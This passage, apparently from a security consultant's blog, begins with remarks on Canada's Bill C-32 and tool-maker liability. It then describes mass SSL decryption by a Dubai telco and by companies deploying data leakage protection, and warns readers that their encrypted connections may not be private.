I think it makes more sense to punish those that use the tools in a wrong way. If someone were to take the tool and use it in a botnet to extract credit card information, then the individuals that did this are guilty and should be charged. The person that made the tool is not the guilty party. It is like making Smith & Wesson responsible because they created the firearm that was used in a murder.

Overall, I think Bill C-32 has made much progress from the previous bills in Canada.  My hope is that the Government starts to do their job and properly debate the bill and get input from all interested parties, not label people that question them as extremists.

A couple of years ago I was at a client's site in Dubai. The client was a telco, and I was doing some security consulting for them. Like many countries in the Middle East, Dubai actively monitors data entering and leaving the country. Privacy laws, as far as I could determine, do not exist. All internet communications are actively monitored. It is quite common to suddenly see a web page pop up explaining in Arabic that the site you are trying to view is not authorized and you have been denied. Telcos there have spent millions of dollars on infrastructure in order to enforce these requirements. The design is not as complex as one might think, just resource intensive. Resources are required to process the data in real time, and staff is required to maintain the infrastructure, look into events and other tasks. Telcos do this because it is required by law. You cannot obtain a license as a telco unless you have monitoring capabilities deployed.

My first day in Dubai, I went to lunch with one of the executives of the telco. During our lunch, I asked him how they manage encrypted connections. He explained that they were currently getting ready to deploy a solution to solve that. The infrastructure was being upgraded to decrypt all SSL sessions and parse the data as required. Aside from opening my eyes to the difference in privacy between North America and the Middle East, I found it interesting that SSL decrypting was so easily available. Previously, I had seen software that law enforcement used for this purpose. I myself had done it for clients using available tools during an engagement. But these tools were designed more for targeted surveillance, not mass scale. Like all technology, it improves and gets less expensive over time, I guess.

Today, there are many more companies in North America and abroad that either have deployed SSL decrypting capabilities or are in the process of doing so. Security, diagnostics, audit and legal requirements to know what is coming into and leaving their networks, and being able to log and trace data transmissions back to the originator, are some of the reasons. One driver is Data Leakage Protection (DLP), currently a very 'hot' topic with many new vendors jumping on the opportunity with solutions. In order to look for data leakage, you need to see past any encryption that might be present. Cisco, Blue Coat, Palo Alto and Fortinet are just a few companies that offer products for SSL decryption.

With Google deploying encryption for Gmail and more recently for search, and plug-ins such as the EFF Firefox plug-in to help secure your communications, companies are feeling more and more concerned about what data is coming and going. What worries me is that all these security, legal and audit requirements companies face are actually not helping them in the long run. If these companies are decrypting SSL sessions that egress and ingress their network, you can be sure that other companies are doing the same to theirs. The net result is that everything is decrypted and no one has any privacy.

Next time you connect to your bank, doctor's office, insurance company, Gmail or any site and see secure indications from your browser similar to these, along with the company's reassurances that the site is secure, keep in mind things may not be as they appear – today even more so than yesterday.

Do you deploy any type of decryption on your network? If it is deployed, are you aware of it?
